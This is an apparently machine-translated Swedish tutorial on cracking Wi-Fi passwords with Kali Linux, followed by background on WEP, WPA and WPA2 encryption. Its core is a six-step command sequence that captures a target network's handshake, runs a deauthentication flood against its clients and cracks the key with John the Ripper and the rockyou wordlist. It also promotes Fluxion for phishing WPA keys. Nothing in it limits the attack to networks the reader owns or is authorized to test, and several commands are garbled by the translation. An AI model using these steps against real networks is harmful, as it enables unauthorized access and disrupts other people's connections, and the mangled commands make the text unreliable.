Hur Hacka Wifi Med Kali Linux?

de flesta frågor på Google är hur man hackar Wifi med Kali Linux, Hack wifi, hur man hackar Wifi med Kali Linux, etc. Men först förstå vad som är Wifi & dess kryptering.

Post innehåll

Vad är Wi-Fi och är det möjligt att hacka det?

Wi-Fi är namnet på en populär trådlös nätverksteknik som använder radiovågor för att tillhandahålla trådlöst höghastighetsinternet och nätverksanslutningar. En vanlig missuppfattning är att termen Wi-Fi är kort för” trådlös trohet”, men detta är inte fallet. Wi-Fi är helt enkelt en varumärkesskyddad fras som betyder IEEE 802.11 x.

när vi pratar om wifi-hacking från vilken enhet som helst, betyder säkerheten för den wifi mest. Så när vi försöker hacka wifi är det väldigt lätt att knäcka eller hacka lösenordet för WPS tillgängligt system. WPS är en av de typer av kryptering, som används för att säkra wifi-nätverket, så låt börja med snabb handledning.

verktyg som används för att hacka WiFi lösenord i Kali-Linux

huvudsakligen använder vi kali Linux inbyggd toolset att hacka wifi lösenord som är följande:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

detta skript kan användas för att aktivera övervakningsläge på trådlösa gränssnitt. Det kan också användas för att gå tillbaka från bildskärmsläge till hanterat läge. Om du anger airmon – ng-kommandot utan parametrar visas gränssnittets status.

användning: airmon-ng < start / stopp> < gränssnitt>eller airmon-ng < kontrollera|kontrollera döda>

Aireplay-ng

Aireplay-ng används för att injicera ramar.

den primära funktionen är att generera trafik för senare användning i aircrack-ng för att knäcka WEP-och WPA-PSK-tangenterna. Det finns olika attacker som kan orsaka deauthentications i syfte att fånga WPA handskakningsdata, falska autentiseringar, interaktiv paketuppspelning, handgjord Arp-begäran injektion och ARP-begäran återinjektion. Med packetforge-ng-verktyget är det möjligt att skapa godtyckliga ramar.

de flesta förare måste patchas för att kunna injicera.

Airodump-ng

Airodump-ng används för paketinspelning av raw 802.11-ramar och är särskilt lämplig för att samla in WEP IVs (Initialiseringsvektor) för avsikt att använda dem med aircrack-ng. Om du har en GPS-mottagare ansluten till datorn kan airodump-ng logga koordinaterna för de hittade åtkomstpunkterna.

dessutom skriver airodump-ng ut flera filer som innehåller information om alla åtkomstpunkter och klienter som ses.

Hccap

att konvertera aircrack-ng fånga hashes till .hccapx vi använder det här kommandot.

John the Ripper

för att knäcka lösenordet använder vi john the ripper i det sista steget. vi använder det här verktyget för att jämföra hasharna med lösenordsordlistan. Det finns många andra sätt men vi kommer att prova en av dem.

Aircrack-ng

Aircrack-ng är en komplett uppsättning verktyg för att bedöma WiFi-nätverkssäkerhet.

det fokuserar på olika områden av WiFi-säkerhet:

  • övervakning: Paketfångst och export av data till textfiler för vidare bearbetning av tredjepartsverktyg
  • Attacking: Replay-attacker, deauthentication, falska åtkomstpunkter och andra via paketinjektion
  • Testing: kontrollera WiFi-kort och drivrutinsfunktioner (capture and injection)
  • Cracking: WEP och WPA PSK (WPA 1 och WPA) 2)

steg för att hacka WiFi med Kali-Linux eller med något annat Debian Linux OS.

alla kommandon med beskrivning ges ovan kontrollera att om du har några problem.

Steg 1 :

ta först ditt nätverkskort i monitorläge för att övervaka de omgivande nätverken.

# airmon-ng start wlan1

1
2

#airodump-ng wlan1mon

3
4

steg 2:

# airodump-ng-bssid 2C: 55: D3: B1: 35: 0C-c 1-w kalip300 wlan1mon

5
6

steg 3:

#aireplay-ng -0 0-a 2C:55:D3:B1: 35:0C wlan1mon

7

när vi fånga sucsessfully handshak fil ser vi något liknande.

8

steg 4:

#aircrack-ng kalip300-01.cap-J john

9

Steg 5:

#hccap2john john.hccap > wpa

steg 6:

#john –ordlista*/rot/skrivbord/rockyou.txt / root / Desktop / wpa

och vi hackar framgångsrikt wifi-lösenordet av kali linux

Wifi Hacking Tool :- Fluxion

Fluxion är en säkerhetsrevision och social ingenjörskonst forskningsverktyg. Det är en remake av linset av vk496 med (förhoppningsvis) färre buggar och mer funktionalitet. Skriptet försöker hämta WPA / WPA2 nyckel från ett mål åtkomstpunkt med hjälp av en social engineering (phishing) attack. Den är kompatibel med den senaste versionen av Kali (rolling). Fluxions attacker är oftast manuella, men experimentellt auto-läge hanterar några av attackernas inställningsparametrar. Läs FAQ innan du begär frågor.

trådlös kryptering

WEP-kryptering

Wired Equivalent Privacy (WEP) är ett IEEE 802.11 trådlöst protokoll som tillhandahåller säkerhetsalgoritmer för datasekretess under trådlösa överföringar.

WEP använder en 24-bitars Initialiseringsvektor(IV) för att bilda strömkodning RC4 för konfidentialitet och CRC-32-kontrollsumman för intergrity av trådlös överföring.

hur WEP fungerar

  1. CRC-32-kontrollsumma används för att beräkna ett 32-bitars Integritetskontrollvärde (ICV) för data, som i sin tur läggs till i dataramen.

2. Ett 24-bitars godtyckligt tal som kallas Initialiseringsvektor (IV) läggs till WEP-nyckel; WEP-nyckel och IV kallas tillsammans som WEP-frö.

3. WEP-fröet används som ingång till RC4-algoritmen för att generera en nyckelström (nyckelströmmen är bitvis XOred med kombinationen av data och ICV för att producera krypterad data).

4. IV-fältet (IV+PAD+KID) läggs till i chiffertexten för att generera MAC Frame

hur WEP fungerar

WPA-kryptering

Wi-Fi Protected Access (WPA) är en datakrypteringsmetod för WLAN baserat på 802.11 standarder.

det är en ögonblicksbild av 802.11 i (under utveckling) som ger starkare kryptering och möjliggör PSK för EAP-autentisering.

hur WPA fungerar

Temporal krypteringsnyckel, sändningsadress och TKIP sequence counter (TSC) används som inmatning till RC4-algoritmen för att generera keystram.

MAC Service Data Unit (MSDU) och message intergrity check (MIC) kombineras med Michael-algoritmen.

kombinationen av MSDU och MIC är fragmenterad för att generera MAC Protocol Data Unit (MPDU).

ett 32-bitars Integritetskontrollvärde (ICV) beräknas för MPDU

kombinationen av MPDU och ICV Xoreras bitvis med Keysteam för att producera krypterad data

IV läggs till i krypterad data för att generera MAC-ram.

WPA 2-kryptering

WPA 2 ger företag och WI-FI-användare med starkare dataskydd och nätverksåtkomstkontroll

ger regeringen grade säkerhet genom att genomföra National Institute of Standards and Technology (NIST) FIPS 140-2 kompatibel AES-krypteringsalgoritm.

WPA2 – Personal

WPA2 – Personal använder ett inställningslösenord (fördelad nyckel) för att skydda obehörig nätverksåtkomst.

i PSK-läge krypterar varje trådlös nätverksenhet nätverkstrafiken med en 128-bitars nyckel som härrör från en lösenfras på 8 till 63 ASCII-tecken.

WPA2 – Enterprise

den innehåller EAP eller RADIUS för centraliserad klientautentisering med flera autentiseringsmetoder, såsom tokenkort, Kerberos, certifikat etc.

användare tilldelas inloggningsuppgifter av en centraliserad server som de måste presentera när de ansluter till nätverket.

hur WPA2 fungerar

i ccmp-implementeringen av WPA2 används Mac-rubrikdata för att bygga additonal authentication data (AAD).

ett sekvenserat paketnummer (PN) används för att bygga nonce.

AAD, temporal key och nonce tillsammans med CCMP används för datakryptering.

en WPA2 MAC Ram bygger med hjälp av MAC header, CCMP header, krypterad data och krypterad MIC

 hur WPA2 fungerar

du kanske missade hur man hacka telefonen

Write a Comment

Din e-postadress kommer inte publiceras.